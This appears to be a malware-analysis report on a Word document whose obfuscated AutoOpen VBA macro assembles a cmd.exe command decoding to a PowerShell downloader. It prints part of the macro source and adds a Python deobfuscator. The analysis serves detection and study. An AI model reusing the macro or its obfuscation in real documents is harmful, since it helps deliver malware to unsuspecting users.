Verdict: MALICIOUS
Risk Score: 142

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
The sample is a malicious Word document carrying a VBA macro. Its AutoOpen procedure runs as soon as the document is opened with macros enabled and passes a command string to Shell. That string never appears in the clear: it is assembled from dozens of short string literals and Chr() calls whose arguments are sums of names that are never assigned (Variant Empty, which is 0 in arithmetic, so Chr(67) is "C" and Chr(34) is a double quote), padded with TypeName calls that do nothing, all under On Error Resume Next so that any failure is silent. Working through the fragments visible in the extracted macro below, the command is a cmd.exe invocation with the /V:O switch (delayed environment-variable expansion) and /C that stores a character table in the variable 7y and then runs a `for %R in (...)` loop whose numeric arguments are positions in that table; reading those positions out of the table reconstructs `powershell $nwz=new-object Net.WebClient;$MvN='http://www.` before the preview is cut off. That is a classic downloader pattern and matches the ClamAV Doc.Downloader signature; the download URL and what is done with the fetched payload are not recoverable from the truncated preview.
Heuristics (5)

- ClamAV: Doc.Downloader.Generic-6666924-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Generic-6666924-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): the document contains VBA macro code.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): an AutoOpen macro is present, so the code runs automatically when the document is opened with macros enabled.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): the OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. This heuristic reports that it recovered no modern VBA project and saw no stronger macro-virus family marker; it is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself. For this sample the VBA project was in fact recovered (see macros.bas under Extracted artifacts), so the marker corroborates the AutoOpen finding rather than adding independent evidence.
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard OOXML DrawingML namespace identifier, not a network indicator.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15965 bytes | 5e5b61fcb9a82f77b3ba6c99693f27dbb7c64c4cf2525b3b05708dabbd86d955 |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "rdnlsnDhI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName Round(53367 * 98974 / sLEXZ / XohnZ)
TypeName CLng(NbMGk / aadcIa)
TypeName Log(37)
TypeName ChrB(jwwPR)
Shell! KeyString(vbKeyC) + GMkzwjjir + FSCznNCshNNtbj + QMoiwqhskH + oOPla + VXrzOiCAmM + oNvuMEWFIE + nHoOud + lhmGoWHvbN + cOERhw + PDtiNJ + OPVmLCOqiwO + HuoBSSuRv + DaJaisVLlp + douYRXDtTI, 104849224 - 104849224
TypeName Atn(qTwvz)
TypeName Sin(LUikmt)
End Sub
Attribute VB_Name = "UsiprQV"
Function QMoiwqhskH()
On Error Resume Next
TypeName wMnFw
TypeName nZYSi
TypeName Atn(99540 / SiNwbb / dRPNo + sTiOG)
ifrPzvpm = "md" + " " + "/V" + ":O" + " " + " " + " /" + CStr(Chr(uEjBCZjcLE + ZwtzbQtu + 67 + ztitOkSZ + qdqAURrz)) + " " + CStr(Chr(ZMwuIqm + WHmOlEnXJKwJma + 34 + wFsdJZwPIj + kkYzudHBDOFvhu)) + " se" + "t " + "7y"
TypeName NQnNPl
TypeName 198680785
ZbXbk = "=NI" + "vzw" + "W" + CStr(Chr(fqnmsYLluulw + FCRqmYmAPI + 67 + RizzvPq + SvBELYnDArKq)) + "o" + "WA" + "T" + "jZn" + "vDK" + "hw"
TypeName CByte(4938803)
TypeName CStr(5188 / aBMUIB - 58610 / uGtDYv)
TypeName rIAZz
ouzPwaknvVH = "j" + "i" + "Bu" + CStr(Chr(DdqHJAib + qGdlwwWGC + 108 + GQlbAwzORILkZ + FIhJFqRhO)) + "ER" + "2}" + "Fbp" + "@" + CStr(Chr(BGCVEouVzNFjIB + NLiWDods + 99 + shwoiWWFwq + DXqEzFAcYHXiDW)) + "5" + "m" + "0;." + "("
TypeName Sin(MiOGm / iDRFjX)
TypeName Atn(wZazH)
TypeName Chr(19981 - rWnfKP * 4767 / dWaRK)
zMBIKEwAij = "\U" + "=" + "H" + "d" + "aS" + "rg" + "'" + "s-" + "/k" + "," + "1:" + "e{"
TypeName 12
TypeName Hex(npnrtj)
TypeName Sgn(NEiTO + osGiE)
PKQzWdzb = "$Ot" + " " + CStr(Chr(qNcJHfvNYIii + EqzRHGf + 76 + YslAkJSlMmnOj + oYccjqb)) + "f" + "xM" + "J" + ")y+" + "P6&" + "&f" + "or " + " %R" + " i" + "n "
TypeName 176831452
TypeName Tan(qJclj)
soNItRV = " (" + " " + " 3" + "0" + " 7 " + " " + " 18" + " " + "56 " + " "
TypeName 77
TypeName ChrB(6)
dKZbaBwnQ = "46 " + "4" + "9 " + "17" + " " + " " + "5"
TypeName Round(65338 / 18832 + 36809 + 98103)
TypeName 100520443
CUcfVkN = "6" + " " + " " + " " + "23 " + "23 " + " "
TypeName Int(hRvCdo - cUKRai)
TypeName CBool(96357 - zLUiO / 28003 / YDszkK)
hlPWqoH = " 6" + "1 5" + "8 " + " 13" + " " + " 18" + " " + " 3"
TypeName Int(NLIfp + WUaBQj - YlwMl - PiUcDj)
TypeName 14
womAqXwc = " 41" + " " + "13 " + "56 " + "18 " + " " + " "
QMoiwqhskH = ifrPzvpm + ZbXbk + ouzPwaknvVH + zMBIKEwAij + PKQzWdzb + soNItRV + dKZbaBwnQ + CUcfVkN + hlPWqoH + womAqXwc
TypeName 1770
TypeName Cos(oHwwUi)
TypeName CByte(SsXYhD)
End Function
Function oOPla()
On Error Resume Next
TypeName 316398493
TypeName EmjbSo
vkwQVL = "50" + " " + "7 " + "29 " + "1" + "9 5" + "6 " + " 3" + "2 " + " " + " " + "6"
TypeName ChrW(FwpWZj)
TypeName 140
ELIjEB = "0 6" + "1 " + "0 5" + "6 " + " " + "60 " + " " + "37" + " " + " "
TypeName 875
TypeName CByte(KqBQoZ)
TypeName Int(OkBlY)
ibozol = " " + "8" + " " + " " + "56" + " "
TypeName QVWCBz
TypeName NoKXM
RApkz = " 2" + "9 " + " " + " 6 " + " " + "2" + "3 " + " "
TypeName 186
TypeName 343001298
iZfTaXC = " 2" + "0" + " " + " " + "56 " + " "
TypeName DYuOSk
TypeName 2
TypeName 3541
rIKOfEY = " " + "1" + "3 " + "60" + " " + "36 " + "5"
TypeName Cos(120148860)
TypeName CLng(CqYVCX)
TypeName Atn(60100 / ukITi)
wvNwvHLo = "8 " + "6" + "5" + " " + "14 " + " "
TypeName JQPIu
TypeName CByte(jCPNa)
BnnWjp = "0" + " 4" + "1" + " " + " 4" + "8 " + "17" + " "
TypeName 88
TypeName qQIQq
mlwUb = " " + " " + "6" + "0 " + "60 " + " " + "30 " + "55 " + "51" + " " + "51" + " " + "18 "
TypeName Int(dMYAAE)
TypeName 2
UlLmC = "18 " + " 18" + " " + " 3" + "7" + " " + " "
TypeName IhYzMG
TypeName Atn(18607 - 27265)
TypeName wsPsTk
MjX
... (truncated)
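The string assembly used by this macro can be undone statically. The following Python script is an added example, not part of the original report or the analyzer's own code: it evaluates the macro's string-building statements (copied verbatim from the preview above into a constructed input block; names the macro never assigns are treated as 0, which is what Variant Empty yields in VBA arithmetic) and then reverses the cmd.exe character-table lookup. Two things are assumed: the Shell call also prepends KeyString(vbKeyC) and the results of GMkzwjjir and FSCznNCshNNtbj, none of which the preview shows, so they are left out; and oOPla's variables are joined in source order because its return statement is truncated.

```python
import re

# Constructed input for this example: the string-building statements copied
# from the macro preview on this page (function QMoiwqhskH, then oOPla).
# Assumption: oOPla joins its variables in source order (its return statement
# is truncated on the page). The index list at the end is incomplete.
VBA_FRAGMENTS = r'''
ifrPzvpm = "md" + " " + "/V" + ":O" + " " + " " + " /" + CStr(Chr(uEjBCZjcLE + ZwtzbQtu + 67 + ztitOkSZ + qdqAURrz)) + " " + CStr(Chr(ZMwuIqm + WHmOlEnXJKwJma + 34 + wFsdJZwPIj + kkYzudHBDOFvhu)) + " se" + "t " + "7y"
ZbXbk = "=NI" + "vzw" + "W" + CStr(Chr(fqnmsYLluulw + FCRqmYmAPI + 67 + RizzvPq + SvBELYnDArKq)) + "o" + "WA" + "T" + "jZn" + "vDK" + "hw"
ouzPwaknvVH = "j" + "i" + "Bu" + CStr(Chr(DdqHJAib + qGdlwwWGC + 108 + GQlbAwzORILkZ + FIhJFqRhO)) + "ER" + "2}" + "Fbp" + "@" + CStr(Chr(BGCVEouVzNFjIB + NLiWDods + 99 + shwoiWWFwq + DXqEzFAcYHXiDW)) + "5" + "m" + "0;." + "("
zMBIKEwAij = "\U" + "=" + "H" + "d" + "aS" + "rg" + "'" + "s-" + "/k" + "," + "1:" + "e{"
PKQzWdzb = "$Ot" + " " + CStr(Chr(qNcJHfvNYIii + EqzRHGf + 76 + YslAkJSlMmnOj + oYccjqb)) + "f" + "xM" + "J" + ")y+" + "P6&" + "&f" + "or " + " %R" + " i" + "n "
soNItRV = " (" + " " + " 3" + "0" + " 7 " + " " + " 18" + " " + "56 " + " "
dKZbaBwnQ = "46 " + "4" + "9 " + "17" + " " + " " + "5"
CUcfVkN = "6" + " " + " " + " " + "23 " + "23 " + " "
hlPWqoH = " 6" + "1 5" + "8 " + " 13" + " " + " 18" + " " + " 3"
womAqXwc = " 41" + " " + "13 " + "56 " + "18 " + " " + " "
vkwQVL = "50" + " " + "7 " + "29 " + "1" + "9 5" + "6 " + " 3" + "2 " + " " + " " + "6"
ELIjEB = "0 6" + "1 " + "0 5" + "6 " + " " + "60 " + " " + "37" + " " + " "
ibozol = " " + "8" + " " + " " + "56" + " "
RApkz = " 2" + "9 " + " " + " 6 " + " " + "2" + "3 " + " "
iZfTaXC = " 2" + "0" + " " + " " + "56 " + " "
rIKOfEY = " " + "1" + "3 " + "60" + " " + "36 " + "5"
wvNwvHLo = "8 " + "6" + "5" + " " + "14 " + " "
BnnWjp = "0" + " 4" + "1" + " " + " 4" + "8 " + "17" + " "
mlwUb = " " + " " + "6" + "0 " + "60 " + " " + "30 " + "55 " + "51" + " " + "51" + " " + "18 "
UlLmC = "18 " + " 18" + " " + " 3" + "7" + " " + " "
'''

TOKEN = re.compile(r'''
    "(?P<lit>(?:[^"]|"")*)"                    # VBA string literal ("" is an escaped quote)
  | CStr\(\s*Chr\((?P<chr1>[^()]*)\)\s*\)      # CStr(Chr(expr))
  | Chr\((?P<chr2>[^()]*)\)                    # bare Chr(expr)
  | \+ | \s+                                   # concatenation operator, whitespace
''', re.VERBOSE)


def vba_number(expr):
    """Flat +/- arithmetic as the macro relies on it: names that are never assigned
    are Variant Empty (0), so only the literal numbers matter ('a + 67 + b' -> 67)."""
    total, sign = 0, 1
    for tok in re.findall(r'[+-]|\d+|[A-Za-z_]\w*', expr):
        if tok in '+-':
            sign = 1 if tok == '+' else -1
            continue
        total += sign * int(tok) if tok.isdigit() else 0
        sign = 1
    return total


def vba_concat(expr):
    """Evaluate a chain of string literals and Chr() calls joined with '+'."""
    out, pos = [], 0
    for m in TOKEN.finditer(expr):
        if m.start() != pos:  # finditer skips unmatched text; refuse anything unknown
            raise ValueError("unsupported VBA near: " + expr[pos:pos + 30])
        pos = m.end()
        if m.group('lit') is not None:
            out.append(m.group('lit').replace('""', '"'))
        elif m.group('chr1') is not None or m.group('chr2') is not None:
            out.append(chr(vba_number(m.group('chr1') or m.group('chr2'))))
    if pos != len(expr):
        raise ValueError("trailing junk: " + expr[pos:])
    return ''.join(out)


def build_shell_string(vba_lines):
    """Evaluate each `name = expr` statement and join the results in source order,
    which is how the macro's return statement concatenates them."""
    pieces = []
    for line in vba_lines.strip().splitlines():
        _name, expr = re.match(r'(\w+)\s*=\s*(.*)', line).groups()
        pieces.append(vba_concat(expr))
    return ''.join(pieces)


def decode_cmd_indexing(cmd):
    """Undo the cmd.exe trick of storing a character table in a variable and
    reading it back one position at a time inside a `for %R in (...)` loop."""
    table = re.search(r'set\s+\w+=(.*?)&&', cmd)
    idx = re.search(r'for\s+%\w+\s+in\s*\(\s*([\d\s]*)', cmd)
    if not table or not idx:
        raise ValueError("no set/for pattern found")
    return ''.join(table.group(1)[int(i)] for i in idx.group(1).split())


if __name__ == '__main__':
    cmd = build_shell_string(VBA_FRAGMENTS)
    print(cmd)                       # the cmd.exe command line, minus the leading "C"
    print(decode_cmd_indexing(cmd))  # what the index list spells out so far
```

Only the positions present in the preview are decoded, so the output stops at the start of the URL; the same two functions apply unchanged once the full macros.bas is available, and the tokenizer deliberately raises on any VBA construct it does not understand rather than guessing.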